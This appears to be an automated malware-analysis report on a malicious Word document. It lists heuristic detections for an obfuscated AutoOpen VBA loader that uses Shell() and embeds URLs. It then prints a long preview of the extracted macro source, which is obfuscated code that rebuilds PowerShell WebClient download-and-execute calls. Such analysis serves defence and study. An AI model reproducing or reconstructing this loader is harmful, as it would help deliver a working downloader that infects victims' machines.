MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The sample contains a critical OLE_VBA_SHELL heuristic firing, indicating the use of the Shell() function. Additionally, an obfuscated auto-exec loader was detected, suggesting malicious intent. The VBA script attempts to download a payload from the URL 'amLSTsowZHbPzSfpiS-immob9m4+9m4ilien.de/9m4+9m4J5c9m4+9m4GuUXiELlzSSjmicIjbOdjl' and execute it, likely leading to further infection.
Heuristics 7
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://9m4+9m4esenUpr In document text (OLE body)
- http://real-expert.inf9m4mWc+mWc+9m4o9m4+9m4/9m4+9m4co9m4+9m4mp9m4+9m4on9m4+9m4ents/Pt09m4mWc+mIn document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 26216 bytes |
SHA-256: 7120fe1abcbaeee72667657b7b1087c85b80aa546088af999edd4b48f40028c4 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "lSajimqhmQYIO"
Function YYAfYup()
On Error Resume Next
iOETroDWbDf = (vERwzTt - Int(ssEGwz) * uJTGOcpAbYAdo / Oct(woArWf) - (KmqbEhknfiOLn - Sin(4698163)))
INDzBSluJBn = (jlmlFEpZwq - Int(vtDDPb) * EkWdfKuF / Oct(wumRAlV) - (PElalU - Sin(2385564)))
CUnKiRuQ = (lzmrkbOmtioGG - Int(bqArsf) * YEKXzo / Oct(qrTPKjt) - (IObUfzY - Sin(3493746)))
UwLANVsEi = (wncfklMIhSmCsB) + HJjkJKD("fscwLwrkVNHZiRX4ncbw+cbwlzmWcbw+cbwc+mWcV0O9m4mWc+'+'mWc+9m4adFIzV0lmWc+mWc9m4+9m4e9m4+9m4t9mWc+mWcm4+9m47W(cbw+'+'cbwc9m4+9m47tavzwf", 16, 114)
QozsMrAi = (AKzmNIwfh - Int(SZniAjPjvohaCX) * XTcwL / Oct(odEfYMI) - (LoIWBjq - Sin(7297935)))
pODlsLfUMoQ = (WfBBqbqa - Int(cjpoVi) * idwiwbTHT / Oct(zZEAoMlBGQK) - (zBOFRkZ - Sin(4576229)))
clVWbXALG = (SZATFtDTu - Int(uiGbQVG) * XDmPRLXjuUsK / Oct(ivNhADhiSii) - (EQdqawj - Sin(1986358)))
RuhwRk = (nEwBPZvWMRilQ) + HJjkJKD("amLSTsowZHbPzSfpiS-imm'+'ob9m4+9m4ilien.de/9m4+9m4J5c9m4+9m4GuUXiELlzSSjmicIjbOdjl", 19, 43)
TzbDGa = (pUWJznjbidsNl - Int(SzIabE) * wfhRlqzwfAuuC / Oct(fMRlpfKORYE) - (vlVwclqCroor - Sin(2834047)))
EuwtIRVKY = (icwdzTiZnnqpmY - Int(jOJMwuLdjXJ) * zsqYZ / Oct(sziPoalFV) - (iFmzRXHaifRCXz - Sin(3049169)))
oFzIwSKmviK = (oOihwO - Int(TubzTZjb) * YNudkJnckPuuE / Oct(aizimWWoBToTF) - (ZoAuDadJEmUib - Sin(1150339)))
ifKPsc = (suQSZFEVEDNu) + HJjkJKD("FWRodw[STRINg][cHAR]39))jzaD", 7, 18)
jzGXX = (dNOHuQrU - Int(SEAnJUJzwFtzdw) * ZiCAR / Oct(fksllGcpK) - (srbVN - Sin(749677)))
CXIuLHdhJf = (tcFBsY - Int(TzPLiQOr) * inTIC / Oct(NhInCBFCc) - (VUIXMTnMZSmr - Sin(3224698)))
CQQCkiPYs = (upAowi - Int(vGVOYtEWRNzmW) * vFTqLAG / Oct(klWQBtMAQFu) - (aNmJoZjqIFoEuu - Sin(9793381)))
jjOdPwiK = (oREzDwPzqiM) + HJjkJKD("dpXj9mmWc'+'+mWc4+9m4ectQEk) S9m4+9m4'+'yste9m4+9m4m.Net.We9m4+mWc+mWc9m4bC9'+'m4+9m4liecbw+cbwnt;c79m4+'+'9mcbw+cbw4tNScbw+cbwB9mmWc+mWc4+9m'+'4 cVYDzMQhXAaWJERUIiELBwlbbOwUBoNHhVw", 4, 144)
FurIoUhtS = (KBlQPafw - Int(WGudTSUL) * OrCQjh / Oct(hrIzLSIRQ) - (wzRYkrnal - Sin(7307131)))
zOHTcsa = (fwdWhUXq - Int(tUDshjWz) * DzdNzV / Oct(uiiAPqvv) - (Cuibiz - Sin(7256041)))
qbmVHd = (AccwZqBUnT - Int(omSzIBmmtqA) * ZIjfo / Oct(XcGLCMUtYVscf) - (XOHWjvWZrL - Sin(8595316)))
RQvILFZ = (JQwrsblh) + HJjkJKD("hTTzafhVtPHlpjR &( $ShELLID[1]+$sHELlID[13]+'x')(('. ( ([StrinG]xdCVerboSEpReFEilPu", 16, 64)
uifSjAArk = (BNwtVwl - Int(TSNvqkfiPCLhni) * dQGwZRcZbusm / Oct(NUHREfJRsj) - (slLBHMzWW - Sin(5222584)))
WSGimzjOpwz = (cPCMdrsm - Int(zwEUv) * ucHVVlhjDnFaRO / Oct(VPAvssOsCSYFjc) - (hrGLSUPBFjuiw - Sin(4820562)))
HrXUhJzc = (QaXDbiDYD - Int(fkFCw) * wEKFOUFwcGO / Oct(OzKPTiCzhfAKi) - (DImkJwJA - Sin(9247001)))
tqdGskWosz = (jFiPdRtQKYf) + HJjkJKD("vPXOiS,mWccbw+cbw+mWc9m4+9m4 uZhZuEicwkvRicj", 7, 23)
RFEWizwrPH = (EzbwRzJr - Int(PlNBjbzWGcGEfq) * HzOWTjzKC / Oct(YpsMiXSjYE) - (wEMoREuWr - Sin(2676785)))
jpJUvSJniRY = (IFoUinYNR - Int(KXIlHJcFoV) * lwLtBh / Oct(iDnKP) - (hmYKoiKKmwmjED - Sin(2055675)))
ZdOCRCW = (SQDsSWHdahFXjO - Int(zIJEUkRRJKww) * YMziq / Oct(kWHXjKfvjHY) - (aYImXuzqKAzu - Sin(6433804)))
BuXaEWsoZzG = (FtPRaAzw) + HJjkJKD("wrVvGAkuIbcqidvGKXswkvzmvrV+cbwRepLACEcbw+cbw(cbw+cbw9'+'m4cbw+cbwc7t9'+'m4,9m4rh59m4).RepLACE(9m4zPj'+'9m'+'4,cb'+'w+cbw[strIN'+'g]'+'mWc+mWc[CHAr]92) mWc+mWc)cbw+cbwmWc).REPlacE(mWccbw+cbwrh5LbicjRNF", 28, 166)
LGaRhGG = (WatmpCiAY - Int(WMpKlZrVXzF) * trumRFBWSp / Oct(JzzLSY) - (wjbuujvSIPw - Sin(2516290)))
JpHGvjlzw = (nSvjCrCkZwBR - Int(CjLoOZwrAYz) * wNqzwmZFDWrEQJ / Oct(WvXiZdNdPG) - (AXQvntvh - Sin(1104681)))
hdFGDRBDq = (MldMcMdjoH - Int(FwavdqaWj) * atclBoIjwIiD / Oct(KKtWzQkzazvvYq) - (KCVLWtlsAaaXUz - Sin(8222651)))
XcpdHPFzFu = (slduooiJk) + HJjkJKD("FjWc &9m4+c'+'bw+cbw9m4(9m4+9m4QEkn9m4+9m4Q9m4+9m4'+'Ek+QEk9m4cbw+cbw+9m4eQEkmWcbw'+'+cbwc+m'+'Wccbw+cbw+9m'+'4+9m4QEkw-o'+'bj'+'ecQEcbw+cbwk+QEktQmWccbw+cbw+mWc9m
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.